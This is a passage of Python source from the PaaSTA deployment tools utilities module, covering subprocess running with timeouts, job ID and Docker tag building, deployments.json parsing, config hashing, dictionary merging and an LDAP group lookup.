stdin_interrupt: bool = False,
popen_kwargs: Dict = {},
**kwargs: Any,
) -> Tuple[int, str]:
"""Given a command, run it. Return a tuple of the return code and any
output.
:param timeout: If specified, the command will be terminated after timeout
seconds.
:param log: If True, the _log will be handled by _run. If set, it is mandatory
to pass at least a :service: and a :component: parameter. Optionally you
can pass :cluster:, :instance: and :loglevel: parameters for logging.
We wanted to use plumbum instead of rolling our own thing with
subprocess.Popen but were blocked by
https://github.com/tomerfiliba/plumbum/issues/162 and our local BASH_FUNC
magic.
"""
output: List[str] = []
if log:
service = kwargs["service"]
component = kwargs["component"]
cluster = kwargs.get("cluster", ANY_CLUSTER)
instance = kwargs.get("instance", ANY_INSTANCE)
loglevel = kwargs.get("loglevel", DEFAULT_LOGLEVEL)
try:
if not isinstance(command, list):
command = shlex.split(command)
popen_kwargs["stdout"] = PIPE
popen_kwargs["stderr"] = STDOUT
popen_kwargs["stdin"] = stdin
popen_kwargs["env"] = env
process = Popen(command, **popen_kwargs)
if stdin_interrupt:
def signal_handler(signum: int, frame: FrameType) -> None:
process.stdin.write("\n".encode("utf-8"))
process.stdin.flush()
process.wait()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# start the timer if we specified a timeout
if timeout:
proctimer = threading.Timer(timeout, _timeout, [process])
proctimer.start()
outfn: Any = print if stream else output.append
for linebytes in iter(process.stdout.readline, b""):
line = linebytes.decode("utf-8", errors="replace").rstrip("\n")
outfn(line)
if log:
_log(
service=service,
line=line,
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
# when finished, get the exit code
process.wait()
returncode = process.returncode
except OSError as e:
if log:
_log(
service=service,
line=e.strerror.rstrip("\n"),
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
output.append(e.strerror.rstrip("\n"))
returncode = e.errno
except (KeyboardInterrupt, SystemExit):
# need to clean up the timing thread here
if timeout:
proctimer.cancel()
raise
else:
# Stop the timer
if timeout:
proctimer.cancel()
if returncode == -9:
output.append(f"Command '{command}' timed out (longer than {timeout}s)")
return returncode, "\n".join(output)
def get_umask() -> int:
"""Get the current umask for this process. NOT THREAD SAFE."""
old_umask = os.umask(0o0022)
os.umask(old_umask)
return old_umask
def get_user_agent() -> str:
base_name = os.path.basename(sys.argv[0])
if base_name == "gunicorn":
return f"{sys.argv[-1]} {paasta_tools.__version__}"
elif len(sys.argv) >= 1:
return f"{base_name} {paasta_tools.__version__}"
else:
return f"PaaSTA Tools {paasta_tools.__version__}"
@contextlib.contextmanager
def atomic_file_write(target_path: str) -> Iterator[IO]:
dirname = os.path.dirname(target_path)
basename = os.path.basename(target_path)
if target_path == "-":
yield sys.stdout
else:
with tempfile.NamedTemporaryFile(
dir=dirname, prefix=(".%s-" % basename), delete=False, mode="w"
) as f:
temp_target_path = f.name
yield f
mode = 0o0666 & (~get_umask())
os.chmod(temp_target_path, mode)
os.rename(temp_target_path, target_path)
class InvalidJobNameError(Exception):
pass
def compose_job_id(
name: str,
instance: str,
git_hash: Optional[str] = None,
config_hash: Optional[str] = None,
spacer: str = SPACER,
) -> str:
"""Compose a job/app id by concatenating its name, instance, git hash, and config hash.
:param name: The name of the service
:param instance: The instance of the service
:param git_hash: The git_hash portion of the job_id. If git_hash is set,
config_hash must also be set.
:param config_hash: The config_hash portion of the job_id. If config_hash
is set, git_hash must also be set.
:returns: <name><SPACER><instance> if no tag, or <name><SPACER><instance><SPACER><hashes>...
if extra hash inputs are provided.
"""
composed = f"{name}{spacer}{instance}"
if git_hash and config_hash:
composed = f"{composed}{spacer}{git_hash}{spacer}{config_hash}"
elif git_hash or config_hash:
raise InvalidJobNameError(
"invalid job id because git_hash (%s) and config_hash (%s) must "
"both be defined or neither can be defined" % (git_hash, config_hash)
)
return composed
def decompose_job_id(job_id: str, spacer: str = SPACER) -> Tuple[str, str, str, str]:
"""Break a composed job id into its constituent (service name, instance,
git hash, config hash) by splitting with ``spacer``.
:param job_id: The composed id of the job/app
:returns: A tuple (service name, instance, git hash, config hash) that
comprise the job_id
"""
decomposed = job_id.split(spacer)
if len(decomposed) == 2:
git_hash = None
config_hash = None
elif len(decomposed) == 4:
git_hash = decomposed[2]
config_hash = decomposed[3]
else:
raise InvalidJobNameError("invalid job id %s" % job_id)
return (decomposed[0], decomposed[1], git_hash, config_hash)
def build_docker_image_name(service: str) -> str:
"""docker-paasta.yelpcorp.com:443 is the URL for the Registry where PaaSTA
will look for your images.
:returns: a sanitized-for-Jenkins (s,/,-,g) version of the
service's path in git. E.g. For github.yelpcorp.com:services/foo the
docker image name is docker_registry/services-foo.
"""
docker_registry_url = get_service_docker_registry(service)
name = f"{docker_registry_url}/services-{service}"
return name
def build_docker_tag(service: str, upstream_git_commit: str) -> str:
"""Builds the DOCKER_TAG string
upstream_git_commit is the SHA that we're building. Usually this is the
tip of origin/master.
"""
tag = "{}:paasta-{}".format(build_docker_image_name(service), upstream_git_commit)
return tag
def check_docker_image(service: str, tag: str) -> bool:
"""Checks whether the given image for :service: with :tag: exists.
:raises: ValueError if more than one docker image with :tag: found.
:returns: True if there is exactly one matching image found.
"""
docker_client = get_docker_client()
image_name = build_docker_image_name(service)
docker_tag = build_docker_tag(service, tag)
images = docker_client.images(name=image_name)
# image['RepoTags'] may be None
# Fixed upstream but only in docker-py 2.
# https://github.com/docker/docker-py/issues/1401
result = [image for image in images if docker_tag in (image["RepoTags"] or [])]
if len(result) > 1:
raise ValueError(
f"More than one docker image found with tag {docker_tag}\n{result}"
)
return len(result) == 1
def datetime_from_utc_to_local(utc_datetime: datetime.datetime) -> datetime.datetime:
return datetime_convert_timezone(
utc_datetime, dateutil.tz.tzutc(), dateutil.tz.tzlocal()
)
def datetime_convert_timezone(
dt: datetime.datetime, from_zone: datetime.tzinfo, to_zone: datetime.tzinfo
) -> datetime.datetime:
dt = dt.replace(tzinfo=from_zone)
converted_datetime = dt.astimezone(to_zone)
converted_datetime = converted_datetime.replace(tzinfo=None)
return converted_datetime
def get_username() -> str:
"""Returns the current username in a portable way. Will use the SUDO_USER
environment variable if present.
http://stackoverflow.com/a/2899055
"""
return os.environ.get("SUDO_USER", pwd.getpwuid(os.getuid())[0])
def get_hostname() -> str:
"""Returns the fully-qualified domain name of the server this code is
running on.
"""
return socket.getfqdn()
def get_soa_cluster_deploy_files(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> Iterator[Tuple[str, str]]:
if service is None:
service = "*"
service_path = os.path.join(soa_dir, service)
valid_clusters = "|".join(load_system_paasta_config().get_clusters())
if instance_type in INSTANCE_TYPES:
instance_types = instance_type
else:
instance_types = "|".join(INSTANCE_TYPES)
search_re = r"/.*/(" + instance_types + r")-(" + valid_clusters + r")\.yaml$"
for yaml_file in glob.glob("%s/*.yaml" % service_path):
try:
with open(yaml_file):
cluster_re_match = re.search(search_re, yaml_file)
if cluster_re_match is not None:
cluster = cluster_re_match.group(2)
yield (cluster, yaml_file)
except IOError as err:
print(f"Error opening {yaml_file}: {err}")
def list_clusters(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> List[str]:
"""Returns a sorted list of clusters a service is configured to deploy to,
or all clusters if ``service`` is not specified.
Includes every cluster that has a ``marathon-*.yaml`` or ``tron-*.yaml`` file associated with it.
:param service: The service name. If unspecified, clusters running any service will be included.
:returns: A sorted list of cluster names
"""
clusters = set()
for cluster, _ in get_soa_cluster_deploy_files(
service=service, soa_dir=soa_dir, instance_type=instance_type
):
clusters.add(cluster)
return sorted(clusters)
def list_all_instances_for_service(
service: str,
clusters: Iterable[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
cache: bool = True,
) -> Set[str]:
instances = set()
if not clusters:
clusters = list_clusters(service, soa_dir=soa_dir)
for cluster in clusters:
if cache:
si_list = get_service_instance_list(
service, cluster, instance_type, soa_dir=soa_dir
)
else:
si_list = get_service_instance_list_no_cache(
service, cluster, instance_type, soa_dir=soa_dir
)
for service_instance in si_list:
instances.add(service_instance[1])
return instances
def filter_templates_from_config(config: Dict) -> Dict[str, Any]:
config = {
key: value for key, value in config.items() if not key.startswith("_")
} # filter templates
return config or {}
def read_service_instance_names(
service: str, instance_type: str, cluster: str, soa_dir: str
) -> Collection[Tuple[str, str]]:
instance_list = []
conf_file = f"{instance_type}-{cluster}"
config = service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir, deepcopy=False,
)
config = filter_templates_from_config(config)
if instance_type == "tron":
for job_name, job in config.items():
action_names = list(job.get("actions", {}).keys())
for name in action_names:
instance = f"{job_name}.{name}"
instance_list.append((service, instance))
else:
for instance in config:
instance_list.append((service, instance))
return instance_list
def get_pipeline_config(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> List[Dict]:
service_configuration = read_service_configuration(service, soa_dir)
return service_configuration.get("deploy", {}).get("pipeline", [])
def get_pipeline_deploy_groups(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> List[str]:
pipeline_steps = [step["step"] for step in get_pipeline_config(service, soa_dir)]
return [step for step in pipeline_steps if is_deploy_step(step)]
def get_service_instance_list_no_cache(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
instance_types: Tuple[str, ...]
if not cluster:
cluster = load_system_paasta_config().get_cluster()
if instance_type in INSTANCE_TYPES:
instance_types = (instance_type,)
else:
instance_types = INSTANCE_TYPES
instance_list: List[Tuple[str, str]] = []
for srv_instance_type in instance_types:
instance_list.extend(
read_service_instance_names(
service=service,
instance_type=srv_instance_type,
cluster=cluster,
soa_dir=soa_dir,
)
)
log.debug("Enumerated the following instances: %s", instance_list)
return instance_list
@time_cache(ttl=5)
def get_service_instance_list(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
return get_service_instance_list_no_cache(
service=service, cluster=cluster, instance_type=instance_type, soa_dir=soa_dir
)
def get_services_for_cluster(
cluster: str = None, instance_type: str = None, soa_dir: str = DEFAULT_SOA_DIR
) -> List[Tuple[str, str]]:
"""Retrieve all services and instances defined to run in a cluster.
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (service, instance)
"""
if not cluster:
cluster = load_system_paasta_config().get_cluster()
rootdir = os.path.abspath(soa_dir)
log.debug(
"Retrieving all service instance names from %s for cluster %s", rootdir, cluster
)
instance_list: List[Tuple[str, str]] = []
for srv_dir in os.listdir(rootdir):
instance_list.extend(
get_service_instance_list(srv_dir, cluster, instance_type, soa_dir)
)
return instance_list
def load_service_instance_configs(
service: str, instance_type: str, cluster: str, soa_dir: str = DEFAULT_SOA_DIR,
) -> Dict[str, InstanceConfigDict]:
conf_file = f"{instance_type}-{cluster}"
user_configs = service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir, deepcopy=False,
)
user_configs = filter_templates_from_config(user_configs)
auto_configs = load_service_instance_auto_configs(
service, instance_type, cluster, soa_dir
)
merged = {}
for instance_name, user_config in user_configs.items():
auto_config = auto_configs.get(instance_name, {})
merged[instance_name] = deep_merge_dictionaries(
overrides=user_config, defaults=auto_config,
)
return merged
def load_service_instance_config(
service: str,
instance: str,
instance_type: str,
cluster: str,
soa_dir: str = DEFAULT_SOA_DIR,
) -> InstanceConfigDict:
if instance.startswith("_"):
raise InvalidJobNameError(
f"Unable to load {instance_type} config for {service}.{instance} as instance name starts with '_'"
)
conf_file = f"{instance_type}-{cluster}"
# We pass deepcopy=False here and then do our own deepcopy of the subset of the data we actually care about. Without
# this optimization, any code that calls load_service_instance_config for every instance in a yaml file is ~O(n^2).
user_config = copy.deepcopy(
service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir, deepcopy=False
).get(instance)
)
if user_config is None:
raise NoConfigurationForServiceError(
f"{instance} not found in config file {soa_dir}/{service}/{conf_file}.yaml."
)
auto_config = load_service_instance_auto_configs(
service, instance_type, cluster, soa_dir
).get(instance, {})
return deep_merge_dictionaries(overrides=user_config, defaults=auto_config,)
def load_service_instance_auto_configs(
service: str, instance_type: str, cluster: str, soa_dir: str = DEFAULT_SOA_DIR,
) -> Dict[str, Dict[str, Any]]:
enabled_types = load_system_paasta_config().get_auto_config_instance_types_enabled()
conf_file = f"{instance_type}-{cluster}"
if enabled_types.get(instance_type):
return service_configuration_lib.read_extra_service_information(
service,
f"{AUTO_SOACONFIG_SUBDIR}/{conf_file}",
soa_dir=soa_dir,
deepcopy=False,
)
else:
return {}
def get_docker_host() -> str:
return os.environ.get("DOCKER_HOST", "unix://var/run/docker.sock")
def get_docker_client() -> Client:
client_opts = kwargs_from_env(assert_hostname=False)
if "base_url" in client_opts:
return Client(**client_opts)
else:
return Client(base_url=get_docker_host(), **client_opts)
def get_running_mesos_docker_containers() -> List[Dict]:
client = get_docker_client()
running_containers = client.containers()
return [
container
for container in running_containers
if "mesos-" in container["Names"][0]
]
class TimeoutError(Exception):
pass
class Timeout:
# From http://stackoverflow.com/questions/2281850/timeout-function-if-it-takes-too-long-to-finish
def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum: int, frame: FrameType) -> None:
raise TimeoutError(self.error_message)
def __enter__(self) -> None:
self.old_handler = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type: Any, value: Any, traceback: Any) -> None:
signal.alarm(0)
signal.signal(signal.SIGALRM, self.old_handler)
def print_with_indent(line: str, indent: int = 2) -> None:
"""Print a line with a given indent level"""
print(" " * indent + line)
class NoDeploymentsAvailable(Exception):
pass
DeploymentsJsonV1Dict = Dict[str, BranchDictV1]
DeployGroup = str
BranchName = str
class _DeploymentsJsonV2ControlsDict(TypedDict, total=False):
force_bounce: Optional[str]
desired_state: str
class _DeploymentsJsonV2DeploymentsDict(TypedDict):
docker_image: str
git_sha: str
class DeploymentsJsonV2Dict(TypedDict):
deployments: Dict[DeployGroup, _DeploymentsJsonV2DeploymentsDict]
controls: Dict[BranchName, _DeploymentsJsonV2ControlsDict]
class DeploymentsJsonDict(TypedDict):
v1: DeploymentsJsonV1Dict
v2: DeploymentsJsonV2Dict
class DeploymentsJsonV1:
def __init__(self, config_dict: DeploymentsJsonV1Dict) -> None:
self.config_dict = config_dict
def get_branch_dict(self, service: str, branch: str) -> BranchDictV1:
full_branch = f"{service}:paasta-{branch}"
return self.config_dict.get(full_branch, {})
def __eq__(self, other: Any) -> bool:
return (
isinstance(other, DeploymentsJsonV1)
and other.config_dict == self.config_dict
)
class DeploymentsJsonV2:
def __init__(self, service: str, config_dict: DeploymentsJsonV2Dict) -> None:
self.config_dict = config_dict
self.service = service
def get_branch_dict(
self, service: str, branch: str, deploy_group: str
) -> BranchDictV2:
full_branch = f"{service}:{branch}"
branch_dict: BranchDictV2 = {
"docker_image": self.get_docker_image_for_deploy_group(deploy_group),
"git_sha": self.get_git_sha_for_deploy_group(deploy_group),
"desired_state": self.get_desired_state_for_branch(full_branch),
"force_bounce": self.get_force_bounce_for_branch(full_branch),
}
return branch_dict
def get_deploy_groups(self) -> Collection[str]:
return self.config_dict["deployments"].keys()
def get_docker_image_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["docker_image"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_git_sha_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["git_sha"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_desired_state_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"desired_state", "start"
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_force_bounce_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"force_bounce", None
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def load_deployments_json(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> Any:
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
config_dict = json.load(f)
return (
DeploymentsJsonV1(config_dict["v1"])
if "v1" in config_dict
else DeploymentsJsonV2(service=service, config_dict=config_dict["v2"])
)
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
def load_v2_deployments_json(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> DeploymentsJsonV2:
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
return DeploymentsJsonV2(service=service, config_dict=json.load(f)["v2"])
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
def get_paasta_branch(cluster: str, instance: str) -> str:
return SPACER.join((cluster, instance))
def parse_timestamp(tstamp: str) -> datetime.datetime:
return datetime.datetime.strptime(tstamp, "%Y%m%dT%H%M%S")
def format_timestamp(dt: datetime.datetime = None) -> str:
if dt is None:
dt = datetime.datetime.utcnow()
return dt.strftime("%Y%m%dT%H%M%S")
def get_paasta_tag_from_deploy_group(identifier: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{identifier}-{timestamp}-{desired_state}"
def get_paasta_tag(cluster: str, instance: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{cluster}.{instance}-{timestamp}-{desired_state}"
def format_tag(tag: str) -> str:
return "refs/tags/%s" % tag
class NoDockerImageError(Exception):
pass
def get_config_hash(config: Any, force_bounce: str = None) -> str:
"""Create an MD5 hash of the configuration dictionary to be sent to
Marathon. Or anything really, so long as str(config) works. Returns
the first 8 characters so things are not really long.
:param config: The configuration to hash
:param force_bounce: a timestamp (in the form of a string) that is appended before hashing
that can be used to force a hash change
:returns: A MD5 hash of str(config)
"""
hasher = hashlib.md5()
hasher.update(
json.dumps(config, sort_keys=True).encode("UTF-8")
+ (force_bounce or "").encode("UTF-8")
)
return "config%s" % hasher.hexdigest()[:8]
def get_git_sha_from_dockerurl(docker_url: str, long: bool = False) -> str:
""" We encode the sha of the code that built a docker image *in* the docker
url. This function takes that url as input and outputs the sha.
"""
parts = docker_url.split("/")
parts = parts[-1].split("-")
sha = parts[-1]
return sha if long else sha[:8]
def get_code_sha_from_dockerurl(docker_url: str) -> str:
""" code_sha is hash extracted from docker url prefixed with "git", short
hash is used because it's embedded in marathon app names and there's length
limit.
"""
try:
git_sha = get_git_sha_from_dockerurl(docker_url, long=False)
return "git%s" % git_sha
except Exception:
return "gitUNKNOWN"
def is_under_replicated(
num_available: int, expected_count: int, crit_threshold: int
) -> Tuple[bool, float]:
"""Calculates if something is under replicated
:param num_available: How many things are up
:param expected_count: How many things you think should be up
:param crit_threshold: Int from 0-100
:returns: Tuple of (bool, ratio)
"""
if expected_count == 0:
ratio = 100.0
else:
ratio = (num_available / float(expected_count)) * 100
if ratio < int(crit_threshold):
return (True, ratio)
else:
return (False, ratio)
def deploy_blacklist_to_constraints(
deploy_blacklist: DeployBlacklist,
) -> List[Constraint]:
"""Converts a blacklist of locations into marathon appropriate constraints.
https://mesosphere.github.io/marathon/docs/constraints.html#unlike-operator
:param blacklist: List of lists of locations to blacklist
:returns: List of lists of constraints
"""
constraints: List[Constraint] = []
for blacklisted_location in deploy_blacklist:
constraints.append([blacklisted_location[0], "UNLIKE", blacklisted_location[1]])
return constraints
def deploy_whitelist_to_constraints(
deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Converts a whitelist of locations into marathon appropriate constraints
https://mesosphere.github.io/marathon/docs/constraints.html#like-operator
:param deploy_whitelist: List of lists of locations to whitelist
:returns: List of lists of constraints
"""
if deploy_whitelist is not None:
(region_type, regions) = deploy_whitelist
regionstr = "|".join(regions)
return [[region_type, "LIKE", regionstr]]
return []
def terminal_len(text: str) -> int:
"""Return the number of characters that text will take up on a terminal. """
return len(remove_ansi_escape_sequences(text))
def format_table(
rows: Iterable[Union[str, Sequence[str]]], min_spacing: int = 2
) -> List[str]:
"""Formats a table for use on the command line.
:param rows: List of rows, each of which can either be a tuple of strings containing the row's values, or a string
to be inserted verbatim. Each row (except literal strings) should be the same number of elements as
all the others.
:returns: A string containing rows formatted as a table.
"""
list_rows = [r for r in rows if not isinstance(r, str)]
# If all of the rows are strings, we have nothing to do, so short-circuit.
if not list_rows:
return cast(List[str], rows)
widths = []
for i in range(len(list_rows[0])):
widths.append(max(terminal_len(r[i]) for r in list_rows))
expanded_rows = []
for row in rows:
if isinstance(row, str):
expanded_rows.append([row])
else:
expanded_row = []
for i, cell in enumerate(row):
if i == len(row) - 1:
padding = ""
else:
padding = " " * (widths[i] - terminal_len(cell))
expanded_row.append(cell + padding)
expanded_rows.append(expanded_row)
return [(" " * min_spacing).join(r) for r in expanded_rows]
_DeepMergeT = TypeVar("_DeepMergeT", bound=Any)
class DuplicateKeyError(Exception):
pass
def deep_merge_dictionaries(
overrides: _DeepMergeT, defaults: _DeepMergeT, allow_duplicate_keys: bool = True
) -> _DeepMergeT:
"""
Merges two dictionaries.
"""
result = copy.deepcopy(defaults)
stack: List[Tuple[Dict, Dict]] = [(overrides, result)]
while stack:
source_dict, result_dict = stack.pop()
for key, value in source_dict.items():
try:
child = result_dict[key]
except KeyError:
result_dict[key] = value
else:
if isinstance(value, dict) and isinstance(child, dict):
stack.append((value, child))
else:
if allow_duplicate_keys:
result_dict[key] = value
else:
raise DuplicateKeyError(
f"defaults and overrides both have key {key}"
)
return result
class ZookeeperPool:
"""
A context manager that shares the same KazooClient with its children. The first nested context manager
creates and deletes the client and shares it with any of its children. This allows to place a context
manager over a large number of zookeeper calls without opening and closing a connection each time.
GIL makes this 'safe'.
"""
counter: int = 0
zk: KazooClient = None
@classmethod
def __enter__(cls) -> KazooClient:
if cls.zk is None:
cls.zk = KazooClient(
hosts=load_system_paasta_config().get_zk_hosts(), read_only=True
)
cls.zk.start()
cls.counter = cls.counter + 1
return cls.zk
@classmethod
def __exit__(cls, *args: Any, **kwargs: Any) -> None:
cls.counter = cls.counter - 1
if cls.counter == 0:
cls.zk.stop()
cls.zk.close()
cls.zk = None
def calculate_tail_lines(verbose_level: int) -> int:
if verbose_level <= 1:
return 0
else:
return 10 ** (verbose_level - 1)
def is_deploy_step(step: str) -> bool:
"""
Returns true if the given step deploys to an instancename
Returns false if the step is a predefined step-type, e.g. itest or command-*
"""
return not (
(step in DEPLOY_PIPELINE_NON_DEPLOY_STEPS) or (step.startswith("command-"))
)
_UseRequestsCacheFuncT = TypeVar("_UseRequestsCacheFuncT", bound=Callable)
def use_requests_cache(
cache_name: str, backend: str = "memory", **kwargs: Any
) -> Callable[[_UseRequestsCacheFuncT], _UseRequestsCacheFuncT]:
def wrap(fun: _UseRequestsCacheFuncT) -> _UseRequestsCacheFuncT:
def fun_with_cache(*args: Any, **kwargs: Any) -> Any:
requests_cache.install_cache(cache_name, backend=backend, **kwargs)
result = fun(*args, **kwargs)
requests_cache.uninstall_cache()
return result
return cast(_UseRequestsCacheFuncT, fun_with_cache)
return wrap
def long_job_id_to_short_job_id(long_job_id: str) -> str:
service, instance, _, __ = decompose_job_id(long_job_id)
return compose_job_id(service, instance)
def mean(iterable: Collection[float]) -> float:
"""
Returns the average value of an iterable
"""
return sum(iterable) / len(iterable)
def prompt_pick_one(sequence: Collection[str], choosing: str) -> str:
if not sys.stdin.isatty():
print(
"No {choosing} specified and no TTY present to ask."
"Please specify a {choosing} using the cli.".format(choosing=choosing),
file=sys.stderr,
)
sys.exit(1)
if not sequence:
print(
f"PaaSTA needs to pick a {choosing} but none were found.", file=sys.stderr
)
sys.exit(1)
global_actions = [str("quit")]
choices = [(item, item) for item in sequence]
if len(choices) == 1:
return choices[0][0]
chooser = choice.Menu(choices=choices, global_actions=global_actions)
chooser.title = 'Please pick a {choosing} from the choices below (or "quit" to quit):'.format(
choosing=str(choosing)
)
try:
result = chooser.ask()
except (KeyboardInterrupt, EOFError):
print("")
sys.exit(1)
if isinstance(result, tuple) and result[1] == str("quit"):
sys.exit(1)
else:
return result
def to_bytes(obj: Any) -> bytes:
if isinstance(obj, bytes):
return obj
elif isinstance(obj, str):
return obj.encode("UTF-8")
else:
return str(obj).encode("UTF-8")
_TimeoutFuncRetType = TypeVar("_TimeoutFuncRetType")
def timeout(
seconds: int = 10,
error_message: str = os.strerror(errno.ETIME),
use_signals: bool = True,
) -> Callable[[Callable[..., _TimeoutFuncRetType]], Callable[..., _TimeoutFuncRetType]]:
if use_signals:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
def _handle_timeout(signum: int, frame: FrameType) -> None:
raise TimeoutError(error_message)
def wrapper(*args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
else:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
# https://github.com/python/mypy/issues/797
return _Timeout(func, seconds, error_message) # type: ignore
return decorate
class _Timeout:
def __init__(
self,
function: Callable[..., _TimeoutFuncRetType],
seconds: float,
error_message: str,
) -> None:
self.seconds = seconds
self.control: queue.Queue[
Tuple[bool, Union[_TimeoutFuncRetType, Tuple]]
] = queue.Queue()
self.function = function
self.error_message = error_message
def run(self, *args: Any, **kwargs: Any) -> None:
# Try and put the result of the function into the q
# if an exception occurs then we put the exc_info instead
# so that it can be raised in the main thread.
try:
self.control.put((True, self.function(*args, **kwargs)))
except Exception:
self.control.put((False, sys.exc_info()))
def __call__(self, *args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
self.func_thread = threading.Thread(target=self.run, args=args, kwargs=kwargs)
self.func_thread.daemon = True
self.timeout = self.seconds + time.time()
self.func_thread.start()
return self.get_and_raise()
def get_and_raise(self) -> _TimeoutFuncRetType:
while not self.timeout < time.time():
time.sleep(0.01)
if not self.func_thread.is_alive():
ret = self.control.get()
if ret[0]:
return cast(_TimeoutFuncRetType, ret[1])
else:
_, e, tb = cast(Tuple, ret[1])
raise e.with_traceback(tb)
raise TimeoutError(self.error_message)
def suggest_possibilities(
word: str, possibilities: Iterable[str], max_suggestions: int = 3
) -> str:
suggestions = cast(
List[str],
difflib.get_close_matches(
word=word, possibilities=set(possibilities), n=max_suggestions
),
)
if len(suggestions) == 1:
return f"\nDid you mean: {suggestions[0]}?"
elif len(suggestions) >= 1:
return f"\nDid you mean one of: {', '.join(suggestions)}?"
else:
return ""
def list_services(soa_dir: str = DEFAULT_SOA_DIR) -> Sequence[str]:
"""Returns a sorted list of all services"""
return sorted(os.listdir(os.path.abspath(soa_dir)))
def get_possible_launched_by_user_variable_from_env() -> str:
return os.getenv("SUDO_USER") or getpass.getuser()
def load_all_configs(
cluster: str, file_prefix: str, soa_dir: str
) -> Mapping[str, Mapping[str, Any]]:
config_dicts = {}
for service in os.listdir(soa_dir):
config_dicts[
service
] = service_configuration_lib.read_extra_service_information(
service, f"{file_prefix}-{cluster}", soa_dir=soa_dir
)
return config_dicts
def ldap_user_search(
cn: str,
search_base: str,
search_ou: str,
ldap_host: str,
username: str,
password: str,
) -> Set[str]:
"""Connects to LDAP and raises a subclass of LDAPOperationResult when it fails"""
tls_config = ldap3.Tls(
validate=ssl.CERT_REQUIRED, ca_certs_file="/etc/ssl/certs/ca-certificates.crt"
)
server = ldap3.Server(ldap_host, use_ssl=True, tls=tls_config)
conn = ldap3.Connection(
server, user=username, password=password, raise_exceptions=True
)
conn.bind()
search_filter = f"(&(memberOf=CN={cn},{search_ou})(!(userAccountControl=514)))"
entries = conn.extend.standard.paged_search(
search_base=search_base,
search_scope=ldap3.SUBTREE,
search_filter=search_filter,
attributes=["sAMAccountName"],
paged_size=1000,
time_limit=10,
)
return {entry["attributes"]["sAMAccountName"] for entry in entries}
def _reorder_docker_volumes(volumes: List[DockerVolume]) -> List[DockerVolume]:
deduped = {
v["containerPath"].rstrip("/") + v["hostPath"].rstrip("/"): v for v in volumes
}.values()
return sort_dicts(deduped)
| 33.742472 | 120 | 0.643167 |
b94b40136f494a017c13ffbbfb05cbe502e960da | 8,664 | py | Python | samples/python/57.teams-conversation-bot/bots/teams_conversation_bot.py | Aliacf21/BotBuilder-Samples | be48548edafd4efdc074f5a59ef2bb3af735ad9a | [
"MIT"
] | 1,998 | 2019-05-07T06:33:22.000Z | 2022-03-31T12:59:15.000Z | samples/python/57.teams-conversation-bot/bots/teams_conversation_bot.py | Aliacf21/BotBuilder-Samples | be48548edafd4efdc074f5a59ef2bb3af735ad9a | [
"MIT"
